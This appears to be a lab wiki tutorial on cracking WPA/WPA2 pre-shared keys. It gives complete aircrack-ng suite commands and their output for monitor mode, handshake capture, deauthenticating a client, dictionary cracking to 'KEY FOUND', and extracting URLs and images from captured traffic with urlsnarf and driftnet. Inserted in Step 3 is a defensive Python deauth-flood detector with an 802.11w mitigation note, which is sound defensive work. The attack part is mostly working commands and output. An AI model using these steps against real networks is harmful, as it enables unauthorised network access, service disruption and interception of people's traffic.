Difference between revisions of "WiFi Sniffing"
- https://www.aircrack-ng.org/doku.php?id=airmon-ng
- https://www.aircrack-ng.org/doku.php?id=airodump-ng
- https://www.aircrack-ng.org/doku.php?id=injection_test
- https://www.aircrack-ng.org/doku.php?id=cracking_wpa
Latest revision as of 17:45, 12 March 2024
Summary
Sniff Wi-Fi traffic using wireless interfaces supporting monitor mode and packet injection (*). WPA/WPA2 supports various types of authentication, but aircrack-ng is only capable of cracking pre-shared keys, so only networks using PSK can be attacked (airodump-ng shows whether a network uses PSK). The pre-shared key is recovered by a plain brute force attack against a dictionary: the PSK has to be in the wordlist used for the attack, otherwise aircrack-ng cannot determine the key. WPA/WPA2 cracking also requires the initial 4-way handshake, which takes place between a client and the AP when the client connects to the network.
Requirements
- Operating system: Kali Linux 64 Bit
- Wireless card: one that can inject packets (see the aircrack-ng injection test)
Prerequisites
The following information about the target network and the hardware used is needed:
- MAC of a wireless client in the network: 34:B2:0A:7D:17:77
- BSSID: 68:02:B8:1F:A1:3A
- ESSID: WLAN18250073
- Channel used by AP: 11
- Wireless interface: wlan0mon
Description
Overview
The following steps are needed to get the password:
1) Use monitor mode on the wireless interface using the AP channel
2) Using airodump-ng on AP channel, collecting needed handshake
3) Use aireplay-ng to deauthenticate a wireless client in the network
4) Use aircrack-ng to crack the key using the collected handshake
Step 1 - Use monitor mode on the wireless interface using the AP channel
To listen to every packet in the air, the wireless card needs to be in monitor mode. A card that is not in monitor mode only receives the packets addressed to itself. When listening to every packet sent, an attacker eventually captures a 4-way handshake, which is used to crack WPA/WPA2. Additionally, one can deauthenticate wireless clients, as explained in a later step.
Depending on the driver used by the card, different methods are needed to enable monitor mode. This tutorial only shows the procedure for the madwifi-ng driver; for further information look at aircrack-ng's tutorial.
Open a terminal and type:
airmon-ng
to determine the driver your card is using. With an Atheros wireless card the output looks like this:
PHY   Interface   Driver      Chipset
phy0  wlan0       ath9k_htc   Qualcomm Atheros Communications AR9271 802.11n
The next step is to switch to monitor mode. Syntax: airmon-ng start <interface> <channel used by AP>. Because we do not know yet which channel the AP uses, we start monitor mode without specifying a channel:
airmon-ng start wlan0
Output:
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  605 NetworkManager
 2948 wpa_supplicant

PHY   Interface   Driver      Chipset
phy0  wlan0mon    ath9k_htc   Qualcomm Atheros Communications AR9271 802.11n
      (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)
Now we can check if the interface is in monitor mode using iwconfig:
iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
tun0      no wireless extensions.
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
As we can see, the interface was renamed from wlan0 to wlan0mon and is in monitor mode. With airodump-ng <interface> we can monitor all APs within reach.
airodump-ng wlan0mon
The output shows all APs with information such as ESSID, BSSID, PWR, beacons, channel, encryption, cipher, and authentication method used:
CH  4 ][ Elapsed: 1 min ][ 2021-12-17 10:40
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
68:02:B8:1F:A1:3A  -50       46       31    0  11  130  WPA2 CCMP   PSK  WLAN18250073
Important for the further attack are the BSSID (68:02:B8:1F:A1:3A) and the channel used (11).
Step 2 - Using airodump-ng on AP channel, collecting needed handshake
Now that we have the BSSID and the channel of the AP, we can start capturing the 4-way handshake with the command airodump-ng -c <channel> --bssid <bssid> -w <filename> <interface>:
airodump-ng -c 11 --bssid 68:02:B8:1F:A1:3A -w CapturedData wlan0mon
Output:
CH 11 ][ Elapsed: 12 s ][ 2021-12-17 11:38   4-Way Handshake CAPTURED
BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
68:02:B8:1F:A1:3A  -48  24       63       62    2  11  130  WPA2 CCMP   PSK  WLAN18250073

BSSID              STATION            PWR   Rate    Lost  Frames  Notes  Probes
68:02:B8:1F:A1:3A  5C:5F:67:29:51:76  -18   0e- 0e     3      62
68:02:B8:1F:A1:3A  66:60:B5:63:1F:B9  -58    0 - 1     0       2
Note: In the top right corner it says 4-Way Handshake CAPTURED. This is just a placeholder edited in; nothing is shown there until a handshake is captured. Once one is captured it says: [ WPA handshake: 68:02:B8:1F:A1:3A
Now the tool collects every packet from this AP. It can take quite a while until a 4-way handshake occurs; Step 3 helps to speed things up.
Step 3 - Use aireplay-ng to deauthenticate a wireless client in the network
A faster way to capture the 4-way handshake is to manually connect an additional client to the wireless network: when the new client connects, the AP starts the 4-way handshake. Because this is impractical, an attacker can instead deauthenticate clients that are already connected to the network, so that they reconnect and the 4-way handshake is repeated. The BSSID and the MAC of the device to deauthenticate are needed for this.
Deauthentication is started with aireplay-ng -0 <number of deauths to send> -a <BSSID> -c <MAC of client> <interface>.
It is important that the airodump-ng capture from Step 2 is still running while the client is deauthenticated, otherwise the handshake is not captured!
aireplay-ng -0 10 -a 68:02:B8:1F:A1:3A -c 34:B2:0A:7D:17:77 wlan0mon
The output:
11:21:15  Waiting for beacon frame (BSSID: 68:02:B8:1F:A1:3A) on channel 11
11:21:16  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs]
11:21:17  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|54 ACKs]
11:21:17  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|59 ACKs]
11:21:18  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|73 ACKs]
11:21:19  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|61 ACKs]
11:21:20  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|52 ACKs]
11:21:20  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|65 ACKs]
11:21:21  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|60 ACKs]
11:21:22  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs]
11:21:22  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|66 ACKs]
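The defender's view of Step 3, as an added example that is not part of the original page or of the aircrack-ng project: a stdlib-only Python parser for 802.11 deauthentication frames and a sliding-window detector that flags a burst like the one in the aireplay-ng output above (64 directed deauths per second to one station). Frame bytes, timestamps and the benign reason-4 deauth are constructed sample data; the BSSID and station MAC are the ones used in this tutorial.

```python
import struct
from collections import defaultdict

MGMT_TYPE, DEAUTH_SUBTYPE = 0, 12               # 802.11 type 0 (management), subtype 12 (deauthentication)
BSSID, STATION = "68:02:B8:1F:A1:3A", "34:B2:0A:7D:17:77"   # AP and client from the tutorial above

def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def bytes_to_mac(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_frame(frame):
    """Decode the 24-byte 802.11 MAC header and, for deauth frames, the 2-byte reason code."""
    if len(frame) < 24:
        return None
    info = {"type": (frame[0] >> 2) & 0x3, "subtype": (frame[0] >> 4) & 0xF, "reason": None,
            "addr1": bytes_to_mac(frame[4:10]),     # receiver
            "addr2": bytes_to_mac(frame[10:16]),    # transmitter
            "addr3": bytes_to_mac(frame[16:22])}    # BSSID in management frames
    if info["type"] == MGMT_TYPE and info["subtype"] == DEAUTH_SUBTYPE and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info

def build_deauth(dst, src, bssid, reason=7, seq=0):
    """Constructed sample deauth frame without FCS; reason 7 is the 'code 7' seen in the aireplay-ng log."""
    header = bytes([(DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2), 0]) + b"\x00\x00"   # frame control + duration
    return (header + mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid)
            + struct.pack("<H", seq << 4) + struct.pack("<H", reason))

def detect_deauth_flood(frames, window=5.0, threshold=20):
    """frames: (timestamp, raw_frame) pairs. Returns {(bssid, station): peak deauths per window} at/above threshold."""
    seen = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if not f or f["type"] != MGMT_TYPE or f["subtype"] != DEAUTH_SUBTYPE:
            continue                                # data frames, beacons etc. are ignored
        station = f["addr1"] if f["addr1"] != f["addr3"] else f["addr2"]   # the non-BSSID side is the client
        seen[(f["addr3"], station)].append(ts)
    alerts = {}
    for key, times in seen.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):             # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts

def sample_capture():
    """Constructed capture: a benign deauth (reason 4, inactivity), a data frame, then 64 spoofed deauths in 1 s."""
    data = bytes([0x08, 0]) + b"\x00\x00" + mac_to_bytes(BSSID) + mac_to_bytes(STATION) + mac_to_bytes(BSSID) + b"\x00\x00" + b"\xAA" * 8
    frames = [(0.0, build_deauth(STATION, BSSID, BSSID, reason=4)), (0.5, data)]
    frames += [(60.0 + i / 64, build_deauth(STATION, BSSID, BSSID, reason=7, seq=i)) for i in range(64)]
    return frames
```

A wireless IDS raises the same alert from a monitor-mode capture; the mitigation on the AP side is 802.11w (Protected Management Frames), with which clients discard unauthenticated deauthentication frames.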
Step 4 - Use aircrack-ng to crack the key using the collected handshake
In this step, the captured 4-way handshake is used to crack the pre-shared key. The captured data is stored in files named CapturedData (the -w CapturedData option from Step 2). One can use the dictionary that comes with aircrack-ng called "password.lst". The command is:
aircrack-ng -w password.lst -b 68:02:B8:1F:A1:3A CapturedData*.cap
-w password.lst is the dictionary used
-b is the BSSID of the AP
The wildcard at the end of CapturedData is needed because the capture in Step 2 produced multiple numbered files.
The output looks as follows:
[00:00:00] 2 keys tested (36.20 k/s)

KEY FOUND! [ AKITs1! ]

Master Key     : <Master Key>
Transcient Key : <Transcient Key>
Filter URLs from captured traffic:
urlsnarf -p alfa-01.cap
Filter pictures from captured traffic:
driftnet -f alfa-01.cap -a -d Pictures/
Disable monitor mode:
airmon-ng stop wlan1mon
(*) Test if the adapter supports injection:
aireplay-ng -9 wlan1mon
Detailed information about wireless adapters available in ELVIS can be found here.
(**) This command did not work with ALFA NETWORK AWUS036ACH and ALFA NETWORK AWUS036EAC. The following commands are an alternative way to start monitor mode on the adapter:
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
Results
| Browser | urlsnarf | driftnet |
|---|---|---|
| Microsoft Edge (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
| Mozilla Firefox (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
| Google Chrome (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
| Google Chrome (Android host) | no results reading the pcap file | no results reading the pcap file |
| Samsung Internet (Android host) | URLs captured | images captured |
Used Hardware
- Windows 10 host
- Kali Linux host
- Samsung Galaxy A8
- LG Nexus 5X Google Smartphone 32 GB, Android 6.0 Marshmallow, Carbon
- Panda 300 Mbps Wireless N USB Adapter PAU05
- Alfa AWUS036ACH Wide Range AC1200 Wireless Adapter
- Alfa AWUS036EAC AC1200 USB Wireless Adapter